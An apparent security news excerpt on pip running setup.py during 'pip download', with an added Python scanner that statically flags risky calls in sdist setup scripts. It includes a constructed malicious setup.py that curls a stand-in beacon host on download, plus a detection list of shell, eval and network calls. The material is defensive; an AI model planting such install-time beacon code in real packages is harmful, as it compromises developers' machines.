In another finding that raises the risk of a supply chain attack on developers, it has emerged that nearly one-third of the packages on PyPI, the Python Package Index, trigger automatic code execution as soon as they are downloaded, before anything is installed.
"A worrying feature in pip/PyPI allows code to automatically run when developers are merely downloading a package," Checkmarx researcher Yehuda Gelb said in a technical report published this week.
"Also, this feature is alarming due to the fact that a great deal of the malicious packages we are finding in the wild use this feature of code execution upon installation to achieve higher infection rates."
One way to install a Python package is the "pip install" command, which, when it resolves a source distribution (sdist), runs a file called "setup.py" that comes bundled with the package. Prebuilt wheel distributions carry their metadata statically and do not run setup.py.
"setup.py," as the name implies, is a setup script used to declare the package's metadata, including its dependencies. It is ordinary Python, however, so whatever it contains executes with the user's privileges whenever pip has to build the package's metadata.
Threat actors have long hidden malicious code in setup.py so that it runs during "pip install." Checkmarx found that the same code also runs when a developer merely executes the "pip download" command, which is not supposed to install anything at all.
"pip download does the same resolution and downloading as pip install, but instead of installing the dependencies, it collects the downloaded distributions into the directory provided (defaulting to the current directory)," the documentation reads.
In other words, the command can be used to download a Python package...
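The safe way to look at an untrusted package, given that both "pip install" and "pip download" run setup.py for a source distribution, is to open the sdist archive yourself and read setup.py as text instead of letting pip build its metadata. The scanner below is an added example, not code from the Checkmarx report or from pip: it parses setup.py with Python's ast module, never executes it, and flags calls that have no business in a setup script. The SUSPICIOUS_CALLS list and the two sample setup.py files are constructed for the demo and are assumptions, not a real detection signature set.

```python
"""Inspect an sdist's setup.py without executing it (added example)."""
import ast
import io
import tarfile

# Call targets worth flagging in a setup script. This list is an assumption
# for the demo, not an exhaustive signature set.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
    "urllib.request.urlopen", "requests.get", "base64.b64decode",
    "socket.socket", "ctypes.CDLL",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_source(source):
    """Parse setup.py text and return sorted (lineno, call) findings.

    The script is only parsed, never imported or run. A SyntaxError is
    itself reported, since a setup.py that will not parse deserves a look.
    """
    try:
        tree = ast.parse(source)
    except SyntaxError as e:
        return [(e.lineno or 0, "SyntaxError")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


def scan_sdist(data):
    """Scan every setup.py inside an sdist .tar.gz given as bytes."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                results[member.name] = scan_setup_source(text)
    return results


def build_sdist(dirname, setup_py):
    """Build a minimal in-memory .tar.gz sdist (constructed demo input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(f"{dirname}/setup.py")
        payload = setup_py.encode()
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


# Constructed sample: a setup.py that beacons out while pip generates metadata.
MALICIOUS_SETUP = '''\
import os
import subprocess
from setuptools import setup
subprocess.run(["curl", "-s", "http://example.invalid/beacon"])  # fires on pip download
setup(name="demo-pkg", version="0.1")
'''

# Constructed sample: a setup.py that only declares metadata.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="demo-pkg", version="0.1", install_requires=["requests"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_sdist(build_sdist("demo-pkg-0.1", src)))
```

A static scan like this is a triage aid, not a guarantee: obfuscated setup scripts can hide the call behind getattr or string assembly, so any hit should be read by hand. To avoid the problem entirely, pip's --only-binary=:all: option (accepted by both "pip install" and "pip download") refuses source distributions, so setup.py never runs for packages that ship wheels.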
Read Full Story: https://thehackernews.com/2022/09/warning-pypi-feature-executes-code.html